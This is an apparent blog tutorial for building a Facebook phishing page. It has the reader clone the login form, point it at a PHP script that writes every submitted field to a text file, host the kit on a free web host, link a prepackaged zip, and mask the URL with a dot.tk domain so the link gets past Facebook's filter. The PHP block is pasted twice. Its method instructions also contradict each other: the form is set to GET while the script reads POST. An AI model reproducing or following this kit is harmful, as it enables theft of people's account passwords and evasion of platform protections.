The ways the easiest and most commonly use way of hacking a Facbook account is Phoshing. Now Learn how to Make a Phishing Page. Do as I tell you step by step.
Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
NOW save this as hello.php
Step7 : now make a account on t35.com and Upload
Login.html
hello.php
lol.txt
Now You Have to get a hosting for this Phishing Site. This is the Important part. So, do as I tell you now.
Step 1: The First Step in Making the site is to regester an account at http://www.t35.com/(if you have account than you can skip first 2 steps)
Step 2: Now Goto your email account that you gave and confirm your account with confirmation link.
Step 3: Now Goto www.t35.com/login/ and Log into your account.
Step 4: Now Download this FILE ( http://www.box.net/shared/nv1pz4ivhq )
Step 5: Now when you are logged into your account click on the Upload button.
Step 6: Now click on choose file under "Archives (zip, tar, tgz, gz)" section.
Step 7: Browse the facebook.zip file from folder where you have downloaded it.
Step 8: Now click on the tick button (as shown below) and your files would be uploaded.
Step 9: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they
enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.
NOTE::: To access the input data ( Usernames and Password ) Go to the Following Address:
http://www.yoursitesadress.t35.com/lol.txt
If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://www.box.net/shared/nv1pz4ivhq
=============================================================
The Input Data (Email and Password) will look like following:
==============================================================
UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.t35.com. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding. All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.t35.com you gets www.myphisher.tk. And facebook will allow you to post it.
Related Posts
========================================
{ 0 comments... read them below or add one }
Post a Comment